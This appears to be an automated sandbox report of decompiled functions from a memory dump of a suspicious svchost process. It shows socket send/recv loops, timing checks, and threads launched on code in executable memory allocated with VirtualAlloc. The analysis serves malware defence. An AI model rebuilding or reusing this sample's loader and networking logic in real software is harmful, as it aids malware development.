                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_4000000_svchost.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CounterPerformanceQuerySleep$CountTickclosesocketlstrcatsocket
                                                                                                                                                                                                                                                    • String ID: F
                                                                                                                                                                                                                                                    • API String ID: 900668384-1304234792
                                                                                                                                                                                                                                                    • Opcode ID: 3f257ec96778accae7db7852b0fbcac80dd7221c206c2323f8e06a36ea41de21
                                                                                                                                                                                                                                                    • Instruction ID: efc04feaa42e0dd8c691736b9f02f641cbb91c62c4f6f354fde5ae11d8ba4a5d
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3f257ec96778accae7db7852b0fbcac80dd7221c206c2323f8e06a36ea41de21
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 423132B5D41218ABEB20EFA4DC89BD973B4AB18308F0482D5E5197A181E6756F84CF51
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    C-Code - Quality: 82%
                                                                                                                                                                                                                                                    			E040014DB() {
                                                                                                                                                                                                                                                    				intOrPtr _t45;
                                                                                                                                                                                                                                                    				void* _t71;
                                                                                                                                                                                                                                                    				void* _t73;
                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                    				L0:
                                                                                                                                                                                                                                                    				while(1) {
                                                                                                                                                                                                                                                    					L0:
                                                                                                                                                                                                                                                    					 *((intOrPtr*)(_t71 - 0x210)) =  *((intOrPtr*)(_t71 - 0x210)) + 1;
                                                                                                                                                                                                                                                    					L4:
                                                                                                                                                                                                                                                    					while(1) {
                                                                                                                                                                                                                                                    						L4:
                                                                                                                                                                                                                                                    						if( *((intOrPtr*)(_t71 - 0x210)) < 0x46) {
                                                                                                                                                                                                                                                    							L5:
                                                                                                                                                                                                                                                    							E04001260(_t38, _t71 - 0x208, 0, 0x200);
                                                                                                                                                                                                                                                    							 *((intOrPtr*)(_t71 - 0x21c)) = E04001430(0x64);
                                                                                                                                                                                                                                                    							 *(_t71 - 0x218) = E04001430(7);
                                                                                                                                                                                                                                                    							_t45 = E04001160( *(_t71 - 0x218),  *((intOrPtr*)(0x4088c00 +  *(_t71 - 0x218) * 4)), 0x19, 1, 0x1388); // executed
                                                                                                                                                                                                                                                    							_t73 = _t73 + 0x24;
                                                                                                                                                                                                                                                    							 *((intOrPtr*)(_t71 - 0x214)) = _t45;
                                                                                                                                                                                                                                                    							if( *((intOrPtr*)(_t71 - 0x214)) == 0xffffffff) {
                                                                                                                                                                                                                                                    								L7:
                                                                                                                                                                                                                                                    								Sleep(1); // executed
                                                                                                                                                                                                                                                    								goto L0;
                                                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                                                    								L6:
                                                                                                                                                                                                                                                    								E040013B0(_t71 - 0x208,  *((intOrPtr*)(_t71 - 0x21c))); // executed
                                                                                                                                                                                                                                                    								 *0x400304c(_t71 - 0x208, 0x4003134);
                                                                                                                                                                                                                                                    								 *((intOrPtr*)(_t71 - 0x228)) = GetTickCount();
                                                                                                                                                                                                                                                    								E040010E0( *((intOrPtr*)(_t71 - 0x214)), _t71 - 0x208,  *((intOrPtr*)(_t71 - 0x21c))); // executed
                                                                                                                                                                                                                                                    								 *((intOrPtr*)(_t71 - 0x220)) = 0;
                                                                                                                                                                                                                                                    								 *((intOrPtr*)(_t71 - 0x224)) = 0;
                                                                                                                                                                                                                                                    								E04001040( *((intOrPtr*)(_t71 - 0x214)), _t71 - 0x208, 0x200, _t71 - 0x220, _t71 - 0x224); // executed
                                                                                                                                                                                                                                                    								_t73 = _t73 + 0x28;
                                                                                                                                                                                                                                                    								 *(_t71 - 4) =  *((intOrPtr*)(_t71 - 0x224)) -  *((intOrPtr*)(_t71 - 0x228)) +  *(_t71 - 4);
                                                                                                                                                                                                                                                    								_push( *((intOrPtr*)(_t71 - 0x214))); // executed
                                                                                                                                                                                                                                                    								L04001000(); // executed
                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                    						L8:
                                                                                                                                                                                                                                                    						L1:
                                                                                                                                                                                                                                                    						_t38 =  *((intOrPtr*)(_t71 - 0x20c)) + 1;
                                                                                                                                                                                                                                                    						 *((intOrPtr*)(_t71 - 0x20c)) =  *((intOrPtr*)(_t71 - 0x20c)) + 1;
                                                                                                                                                                                                                                                    						L2:
                                                                                                                                                                                                                                                    						if( *((intOrPtr*)(_t71 - 0x20c)) < 3) {
                                                                                                                                                                                                                                                    							L3:
                                                                                                                                                                                                                                                    							 *((intOrPtr*)(_t71 - 0x210)) = 0;
                                                                                                                                                                                                                                                    							continue;
                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                    						L9:
                                                                                                                                                                                                                                                    						asm("cdq");
                                                                                                                                                                                                                                                    						return  *(_t71 - 4) / 3;
                                                                                                                                                                                                                                                    						L10:
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                    			}






                                                                                                                                                                                                                                                    0x040014db
                                                                                                                                                                                                                                                    0x040014db
                                                                                                                                                                                                                                                    0x040014db
                                                                                                                                                                                                                                                    0x040014e4
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x040014ea
                                                                                                                                                                                                                                                    0x040014ea
                                                                                                                                                                                                                                                    0x040014f1
                                                                                                                                                                                                                                                    0x040014f7
                                                                                                                                                                                                                                                    0x04001505
                                                                                                                                                                                                                                                    0x04001517
                                                                                                                                                                                                                                                    0x04001527
                                                                                                                                                                                                                                                    0x04001544
                                                                                                                                                                                                                                                    0x04001549
                                                                                                                                                                                                                                                    0x0400154c
                                                                                                                                                                                                                                                    0x04001559
                                                                                                                                                                                                                                                    0x0400160d
                                                                                                                                                                                                                                                    0x0400160f
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x0400155f
                                                                                                                                                                                                                                                    0x0400155f
                                                                                                                                                                                                                                                    0x0400156d
                                                                                                                                                                                                                                                    0x04001581
                                                                                                                                                                                                                                                    0x0400158d
                                                                                                                                                                                                                                                    0x040015a8
                                                                                                                                                                                                                                                    0x040015b0
                                                                                                                                                                                                                                                    0x040015ba
                                                                                                                                                                                                                                                    0x040015e5
                                                                                                                                                                                                                                                    0x040015ea
                                                                                                                                                                                                                                                    0x040015fc
                                                                                                                                                                                                                                                    0x04001605
                                                                                                                                                                                                                                                    0x04001606
                                                                                                                                                                                                                                                    0x04001606
                                                                                                                                                                                                                                                    0x04001559
                                                                                                                                                                                                                                                    0x0400161a
                                                                                                                                                                                                                                                    0x040014b3
                                                                                                                                                                                                                                                    0x040014b9
                                                                                                                                                                                                                                                    0x040014bc
                                                                                                                                                                                                                                                    0x040014c2
                                                                                                                                                                                                                                                    0x040014c9
                                                                                                                                                                                                                                                    0x040014cf
                                                                                                                                                                                                                                                    0x040014cf
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x040014cf
                                                                                                                                                                                                                                                    0x0400161f
                                                                                                                                                                                                                                                    0x04001622
                                                                                                                                                                                                                                                    0x0400162d
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x0400162d
                                                                                                                                                                                                                                                    0x040014ea

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 04001430: QueryPerformanceCounter.KERNEL32(00000000), ref: 04001444
                                                                                                                                                                                                                                                      • Part of subcall function 04001160: socket.WS2_32(00000002,00000001,00000006), ref: 0400116C
                                                                                                                                                                                                                                                    • Sleep.KERNELBASE(00000001), ref: 0400160F
                                                                                                                                                                                                                                                      • Part of subcall function 040013B0: QueryPerformanceCounter.KERNEL32(?), ref: 040013E7
                                                                                                                                                                                                                                                      • Part of subcall function 040013B0: Sleep.KERNELBASE(00000000), ref: 040013EF
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(?,04003134), ref: 04001581
                                                                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 04001587
                                                                                                                                                                                                                                                    • closesocket.WS2_32(000000FF), ref: 04001606
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.862471983.0000000004000000.00000040.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.862471983.000000000408A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_4000000_svchost.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CounterPerformanceQuerySleep$CountTickclosesocketlstrcatsocket
                                                                                                                                                                                                                                                    • String ID: F
                                                                                                                                                                                                                                                    • API String ID: 900668384-1304234792
                                                                                                                                                                                                                                                    • Opcode ID: cf3c1adff95c02d838a93fa7c3e08858ca76797544e8a022648dccf564d39913
                                                                                                                                                                                                                                                    • Instruction ID: 6ed18f16ab0dd41aabad2fa4162e749fae483d95e79aad030a55c0feddf4590a
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cf3c1adff95c02d838a93fa7c3e08858ca76797544e8a022648dccf564d39913
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 383164B5D4021CABEB24EF94DC88BD97374AB18308F0482D8E51D7A181EB75AF84CF51
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                                    			E04001989() {
                                                                                                                                                                                                                                                    				intOrPtr _t48;
                                                                                                                                                                                                                                                    				intOrPtr _t50;
                                                                                                                                                                                                                                                    				intOrPtr _t53;
                                                                                                                                                                                                                                                    				void* _t58;
                                                                                                                                                                                                                                                    				void* _t64;
                                                                                                                                                                                                                                                    				void* _t86;
                                                                                                                                                                                                                                                    				void* _t87;
                                                                                                                                                                                                                                                    				void* _t88;
                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                    				while(1) {
                                                                                                                                                                                                                                                    					_t48 = E04001490(); // executed
                                                                                                                                                                                                                                                    					 *((intOrPtr*)(_t86 - 0x19c)) = _t48;
                                                                                                                                                                                                                                                    					if( *((intOrPtr*)(_t86 - 0x19c)) <= 0 ||  *((intOrPtr*)(_t86 - 0x19c)) >= 0x2710) {
                                                                                                                                                                                                                                                    						Sleep(0x7530);
                                                                                                                                                                                                                                                    						continue;
                                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                                    						 *0x4088c2c = CreateEventA(0, 1, 0, 0);
                                                                                                                                                                                                                                                    						_t50 = E040023E0( *(0x4088c1c +  *(_t86 - 0x194) * 4)); // executed
                                                                                                                                                                                                                                                    						_t88 = _t87 + 4;
                                                                                                                                                                                                                                                    						 *((intOrPtr*)(_t86 - 0x1a0)) = _t50;
                                                                                                                                                                                                                                                    						if( *((intOrPtr*)(_t86 - 0x1a0)) != 0) {
                                                                                                                                                                                                                                                    							E04001DC0( *((intOrPtr*)(_t86 - 0x1a0)), 0x4085600); // executed
                                                                                                                                                                                                                                                    							_t64 = E04001470(0xc);
                                                                                                                                                                                                                                                    							_t88 = _t88 + 0xc;
                                                                                                                                                                                                                                                    							 *(_t86 - 0x1b4) = _t64;
                                                                                                                                                                                                                                                    							 *(_t86 - 0x1a4) =  *(_t86 - 0x1b4);
                                                                                                                                                                                                                                                    							 *( *(_t86 - 0x1a4)) =  *(0x4088c1c +  *(_t86 - 0x194) * 4);
                                                                                                                                                                                                                                                    							 *((intOrPtr*)( *(_t86 - 0x1a4) + 4)) =  *((intOrPtr*)(_t86 - 0x1a0));
                                                                                                                                                                                                                                                    							 *((intOrPtr*)( *(_t86 - 0x1a4) + 8)) = 0x4085600;
                                                                                                                                                                                                                                                    							CreateThread(0, 0, E04001630,  *(_t86 - 0x1a4), 0, 0); // executed
                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                    						 *(_t86 - 0x1a8) = 0;
                                                                                                                                                                                                                                                    						while( *(_t86 - 0x1a8) < 3) {
                                                                                                                                                                                                                                                    							_t53 = E040023E0( *(0x4088c20 + ( *((intOrPtr*)(_t86 - 0x198)) +  *(_t86 - 0x1a8)) * 4)); // executed
                                                                                                                                                                                                                                                    							_t88 = _t88 + 4;
                                                                                                                                                                                                                                                    							 *((intOrPtr*)(_t86 - 0x1ac)) = _t53;
                                                                                                                                                                                                                                                    							if( *((intOrPtr*)(_t86 - 0x1ac)) != 0) {
                                                                                                                                                                                                                                                    								E04001DC0( *((intOrPtr*)(_t86 - 0x1ac)), 0x4085600); // executed
                                                                                                                                                                                                                                                    								_t58 = E04001470(0xc);
                                                                                                                                                                                                                                                    								_t88 = _t88 + 0xc;
                                                                                                                                                                                                                                                    								 *(_t86 - 0x1b8) = _t58;
                                                                                                                                                                                                                                                    								 *(_t86 - 0x1b0) =  *(_t86 - 0x1b8);
                                                                                                                                                                                                                                                    								 *( *(_t86 - 0x1b0)) =  *(0x4088c20 + ( *((intOrPtr*)(_t86 - 0x198)) +  *(_t86 - 0x1a8)) * 4);
                                                                                                                                                                                                                                                    								 *((intOrPtr*)( *(_t86 - 0x1b0) + 4)) =  *((intOrPtr*)(_t86 - 0x1ac));
                                                                                                                                                                                                                                                    								 *((intOrPtr*)( *(_t86 - 0x1b0) + 8)) = 0x4085600;
                                                                                                                                                                                                                                                    								CreateThread(0, 0, E04001630,  *(_t86 - 0x1b0), 0, 0); // executed
                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                    							 *(_t86 - 0x1a8) =  *(_t86 - 0x1a8) + 1;
                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                    						WaitForSingleObject( *0x4088c2c, 0xffffffff);
                                                                                                                                                                                                                                                    						Sleep(0x9c40);
                                                                                                                                                                                                                                                    						L04001006();
                                                                                                                                                                                                                                                    						ExitProcess(0);
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                    			}











                                                                                                                                                                                                                                                    0x04001996
                                                                                                                                                                                                                                                    0x040017b6
                                                                                                                                                                                                                                                    0x040017bb
                                                                                                                                                                                                                                                    0x040017c8
                                                                                                                                                                                                                                                    0x04001990
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x040017de
                                                                                                                                                                                                                                                    0x040017ec
                                                                                                                                                                                                                                                    0x040017ff
                                                                                                                                                                                                                                                    0x04001804
                                                                                                                                                                                                                                                    0x04001807
                                                                                                                                                                                                                                                    0x04001814
                                                                                                                                                                                                                                                    0x04001822
                                                                                                                                                                                                                                                    0x0400182c
                                                                                                                                                                                                                                                    0x04001831
                                                                                                                                                                                                                                                    0x04001834
                                                                                                                                                                                                                                                    0x04001840
                                                                                                                                                                                                                                                    0x04001859
                                                                                                                                                                                                                                                    0x04001867
                                                                                                                                                                                                                                                    0x04001870
                                                                                                                                                                                                                                                    0x0400188b
                                                                                                                                                                                                                                                    0x0400188b
                                                                                                                                                                                                                                                    0x04001891
                                                                                                                                                                                                                                                    0x040018ac
                                                                                                                                                                                                                                                    0x040018cd
                                                                                                                                                                                                                                                    0x040018d2
                                                                                                                                                                                                                                                    0x040018d5
                                                                                                                                                                                                                                                    0x040018e2
                                                                                                                                                                                                                                                    0x040018f4
                                                                                                                                                                                                                                                    0x040018fe
                                                                                                                                                                                                                                                    0x04001903
                                                                                                                                                                                                                                                    0x04001906
                                                                                                                                                                                                                                                    0x04001912
                                                                                                                                                                                                                                                    0x04001931
                                                                                                                                                                                                                                                    0x0400193f
                                                                                                                                                                                                                                                    0x04001948
                                                                                                                                                                                                                                                    0x04001963
                                                                                                                                                                                                                                                    0x04001963
                                                                                                                                                                                                                                                    0x040018a6
                                                                                                                                                                                                                                                    0x040018a6
                                                                                                                                                                                                                                                    0x04001976
                                                                                                                                                                                                                                                    0x04001981
                                                                                                                                                                                                                                                    0x0400199b
                                                                                                                                                                                                                                                    0x040019a2
                                                                                                                                                                                                                                                    0x040019a2
                                                                                                                                                                                                                                                    0x040017c8

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 04001490: lstrcat.KERNEL32(?,04003134), ref: 04001581
                                                                                                                                                                                                                                                      • Part of subcall function 04001490: GetTickCount.KERNEL32 ref: 04001587
                                                                                                                                                                                                                                                      • Part of subcall function 04001490: closesocket.WS2_32(000000FF), ref: 04001606
                                                                                                                                                                                                                                                    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 040017E6
                                                                                                                                                                                                                                                    • CreateThread.KERNELBASE(00000000,00000000,Function_00001630,?,00000000,00000000), ref: 0400188B
                                                                                                                                                                                                                                                    • CreateThread.KERNELBASE(00000000,00000000,Function_00001630,?,00000000,00000000), ref: 04001963
                                                                                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 04001976
                                                                                                                                                                                                                                                    • Sleep.KERNEL32(00009C40), ref: 04001981
                                                                                                                                                                                                                                                      • Part of subcall function 04001DC0: VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000040), ref: 04001E14
                                                                                                                                                                                                                                                      • Part of subcall function 04001470: GetProcessHeap.KERNEL32(00000008,?), ref: 04001479
                                                                                                                                                                                                                                                      • Part of subcall function 04001470: RtlAllocateHeap.NTDLL(00000000), ref: 04001480
                                                                                                                                                                                                                                                    • Sleep.KERNEL32(00007530), ref: 04001990
                                                                                                                                                                                                                                                    • WSACleanup.WS2_32 ref: 0400199B
                                                                                                                                                                                                                                                    • ExitProcess.KERNEL32 ref: 040019A2
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.862471983.0000000004000000.00000040.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.862471983.000000000408A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_4000000_svchost.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Create$HeapProcessSleepThread$AllocAllocateCleanupCountEventExitObjectSingleTickVirtualWaitclosesocketlstrcat
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3000315311-0
                                                                                                                                                                                                                                                    • Opcode ID: ed75c3485ee5f6438b7b72692c8e44a361812d41e5d2ef45d7a2c52b189860e4
                                                                                                                                                                                                                                                    • Instruction ID: ecbd1e530684247b239ee6e1b256228db756e23c6e027602103708aff6be2e82
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ed75c3485ee5f6438b7b72692c8e44a361812d41e5d2ef45d7a2c52b189860e4
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 84410674A012289FFB60DF14DC95BDAB7B0AB4A708F1480E8E5497B2C4D7756E80CF46
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 294 4001040-400104a 295 4001052-4001054 294->295 296 400104c-4001050 294->296 298 40010d3-40010d6 295->298 296->295 297 4001056 296->297 299 400105d-4001061 297->299 300 4001063-4001065 299->300 301 4001067-4001084 recv 299->301 300->298 302 4001086-400108c 301->302 303 400109f-40010a3 301->303 302->303 306 400108e-4001092 302->306 304 40010a5 303->304 305 40010a7-40010ab 303->305 307 40010c3-40010c7 304->307 308 40010ad 305->308 309 40010af-40010c1 305->309 306->303 310 4001094-400109d GetTickCount 306->310 311 40010d1 307->311 312 40010c9-40010cf 307->312 308->307 309->299 310->303 311->298 312->311
                                                                                                                                                                                                                                                    C-Code - Quality: 79%
                                                                                                                                                                                                                                                    			E04001040(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16, intOrPtr* _a20) {
                                                                                                                                                                                                                                                    				intOrPtr _v8;
                                                                                                                                                                                                                                                    				intOrPtr _v12;
                                                                                                                                                                                                                                                    				intOrPtr _t26;
                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                    				if(_a8 == 0 || _a12 < 0) {
                                                                                                                                                                                                                                                    					return 0;
                                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                                    					_v8 = 0;
                                                                                                                                                                                                                                                    					while(_a12 != 0) {
                                                                                                                                                                                                                                                    						_push(0);
                                                                                                                                                                                                                                                    						_t26 = _a12;
                                                                                                                                                                                                                                                    						_push(_t26);
                                                                                                                                                                                                                                                    						_push(_a8 + _v8);
                                                                                                                                                                                                                                                    						_push(_a4); // executed
                                                                                                                                                                                                                                                    						L04001024(); // executed
                                                                                                                                                                                                                                                    						_v12 = _t26;
                                                                                                                                                                                                                                                    						if(_a20 != 0 &&  *_a20 == 0 && _v12 > 0) {
                                                                                                                                                                                                                                                    							 *_a20 = GetTickCount();
                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                    						if(_v12 >= 0) {
                                                                                                                                                                                                                                                    							if(_v12 != 0) {
                                                                                                                                                                                                                                                    								_v8 = _v8 + _v12;
                                                                                                                                                                                                                                                    								_a12 = _a12 - _v12;
                                                                                                                                                                                                                                                    								continue;
                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                    							goto L15;
                                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                                    							L15:
                                                                                                                                                                                                                                                    							if(_a16 != 0) {
                                                                                                                                                                                                                                                    								 *_a16 = _v8;
                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                    							return 1;
                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    					return 0;
                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                    			}






                                                                                                                                                                                                                                                    0x0400104a
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x04001056
                                                                                                                                                                                                                                                    0x04001056
                                                                                                                                                                                                                                                    0x0400105d
                                                                                                                                                                                                                                                    0x04001067
                                                                                                                                                                                                                                                    0x04001069
                                                                                                                                                                                                                                                    0x0400106c
                                                                                                                                                                                                                                                    0x04001073
                                                                                                                                                                                                                                                    0x04001077
                                                                                                                                                                                                                                                    0x04001078
                                                                                                                                                                                                                                                    0x0400107d
                                                                                                                                                                                                                                                    0x04001084
                                                                                                                                                                                                                                                    0x0400109d
                                                                                                                                                                                                                                                    0x0400109d
                                                                                                                                                                                                                                                    0x040010a3
                                                                                                                                                                                                                                                    0x040010ab
                                                                                                                                                                                                                                                    0x040010b5
                                                                                                                                                                                                                                                    0x040010be
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x040010be
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x040010a5
                                                                                                                                                                                                                                                    0x040010c3
                                                                                                                                                                                                                                                    0x040010c7
                                                                                                                                                                                                                                                    0x040010cf
                                                                                                                                                                                                                                                    0x040010cf
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x040010d1
                                                                                                                                                                                                                                                    0x040010a3
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x04001063

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • recv.WS2_32(?,00000000,?,00000000), ref: 04001078
                                                                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 04001094
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.862471983.0000000004000000.00000040.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.862471983.000000000408A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_4000000_svchost.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CountTickrecv
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1874678310-0
                                                                                                                                                                                                                                                    • Opcode ID: 6b4986c91a39f45b3505869805ead1539d7754d72571547b31f3d810936fcdc1
                                                                                                                                                                                                                                                    • Instruction ID: 449e92a0b18f183db0f7345c8df75c2f30566562dbb85a03ceabff6c1882a85f
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6b4986c91a39f45b3505869805ead1539d7754d72571547b31f3d810936fcdc1
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B821F274900299EFEF10CFA4D4447AE7BF1AF04309F108559E8456B281D7B6AA94DB92
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 313 40010e0-40010ea 314 40010f2-40010f4 313->314 315 40010ec-40010f0 313->315 317 400114d-4001150 314->317 315->314 316 40010f6 315->316 318 40010fd-4001101 316->318 319 4001103-4001120 send 318->319 320 400113a-400114b send 318->320 321 4001122-4001124 319->321 322 4001126-4001138 319->322 320->317 321->317 322->318
                                                                                                                                                                                                                                                    C-Code - Quality: 54%
                                                                                                                                                                                                                                                    			E040010E0(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                                                                                                                    				intOrPtr _v8;
                                                                                                                                                                                                                                                    				intOrPtr _v12;
                                                                                                                                                                                                                                                    				intOrPtr _t22;
                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                    				if(_a8 == 0 || _a12 < 0) {
                                                                                                                                                                                                                                                    					return 0;
                                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                                    					_v8 = 0;
                                                                                                                                                                                                                                                    					while(_a12 != 0) {
                                                                                                                                                                                                                                                    						_push(0);
                                                                                                                                                                                                                                                    						_t22 = _a12;
                                                                                                                                                                                                                                                    						_push(_t22);
                                                                                                                                                                                                                                                    						_push(_a8 + _v8);
                                                                                                                                                                                                                                                    						_push(_a4); // executed
                                                                                                                                                                                                                                                    						L04001012(); // executed
                                                                                                                                                                                                                                                    						_v12 = _t22;
                                                                                                                                                                                                                                                    						if(_v12 != 0xffffffff) {
                                                                                                                                                                                                                                                    							_v8 = _v8 + _v12;
                                                                                                                                                                                                                                                    							_a12 = _a12 - _v12;
                                                                                                                                                                                                                                                    							continue;
                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                    						return 0;
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    					_push(0);
                                                                                                                                                                                                                                                    					_push(0);
                                                                                                                                                                                                                                                    					_push(_a8);
                                                                                                                                                                                                                                                    					_push(_a4); // executed
                                                                                                                                                                                                                                                    					L04001012(); // executed
                                                                                                                                                                                                                                                    					return 1;
                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                    			}






                                                                                                                                                                                                                                                    0x040010ea
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x040010f6
                                                                                                                                                                                                                                                    0x040010f6
                                                                                                                                                                                                                                                    0x040010fd
                                                                                                                                                                                                                                                    0x04001103
                                                                                                                                                                                                                                                    0x04001105
                                                                                                                                                                                                                                                    0x04001108
                                                                                                                                                                                                                                                    0x0400110f
                                                                                                                                                                                                                                                    0x04001113
                                                                                                                                                                                                                                                    0x04001114
                                                                                                                                                                                                                                                    0x04001119
                                                                                                                                                                                                                                                    0x04001120
                                                                                                                                                                                                                                                    0x0400112c
                                                                                                                                                                                                                                                    0x04001135
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x04001135
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x04001122
                                                                                                                                                                                                                                                    0x0400113a
                                                                                                                                                                                                                                                    0x0400113c
                                                                                                                                                                                                                                                    0x04001141
                                                                                                                                                                                                                                                    0x04001145
                                                                                                                                                                                                                                                    0x04001146
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x0400114b

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • send.WS2_32(?,00000000,?,00000000), ref: 04001114
                                                                                                                                                                                                                                                    • send.WS2_32(?,00000000,00000000,00000000), ref: 04001146
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.862471983.0000000004000000.00000040.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.862471983.000000000408A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_4000000_svchost.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: send
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2809346765-0
                                                                                                                                                                                                                                                    • Opcode ID: b2e598ef71c8ac5d0c56a500729e24b321e62eb8f582e8b020920d41a4434bf5
